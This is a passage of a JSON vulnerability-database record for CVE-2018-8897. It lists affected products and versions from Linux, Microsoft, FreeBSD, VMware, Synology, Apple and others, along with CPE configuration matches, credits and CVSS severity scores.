        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "11.2-prerelease",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "10.4-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.2"
      },
      {
        "model": "virtual dsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "synology",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.2"
      },
      {
        "model": "windows server r2 for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.22"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3.1"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13"
      },
      {
        "model": "enterprise linux long life 5.9.server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "dsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "synology",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.91"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.3.1"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.8"
      },
      {
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.0-28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel 4.10-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.4"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "11.2"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "model": "10.4-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "windows for 32-bit systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.13.4"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "10.4-release-p9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "windows for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.14"
      },
      {
        "model": "kernel 4.12-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "mrg realtime for rhel server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.3"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.4"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.9"
      },
      {
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.68"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.14"
      },
      {
        "model": "skynas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "synology",
        "version": "0"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.7"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.7"
      },
      {
        "model": "macos security update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2018"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "17090"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.8"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1018030"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.12.4"
      },
      {
        "model": "11.1-release-p10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.1"
      },
      {
        "model": "10.4-stable",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "104071"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003031"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_virtualization_manager:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:synology:diskstation_manager:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:synology:diskstation_manager:5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:synology:diskstation_manager:6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "10.13.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:-:*:*:*:*:*:x86:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.1",
                "versionStartIncluding": "11.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "147550"
      },
      {
        "db": "PACKETSTORM",
        "id": "147540"
      },
      {
        "db": "PACKETSTORM",
        "id": "147535"
      },
      {
        "db": "PACKETSTORM",
        "id": "147545"
      },
      {
        "db": "PACKETSTORM",
        "id": "147548"
      },
      {
        "db": "PACKETSTORM",
        "id": "147646"
      },
      {
        "db": "PACKETSTORM",
        "id": "147539"
      },
      {
        "db": "PACKETSTORM",
        "id": "147542"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2018-8897",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-138929",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-8897",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-138929",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138929"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-8897"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
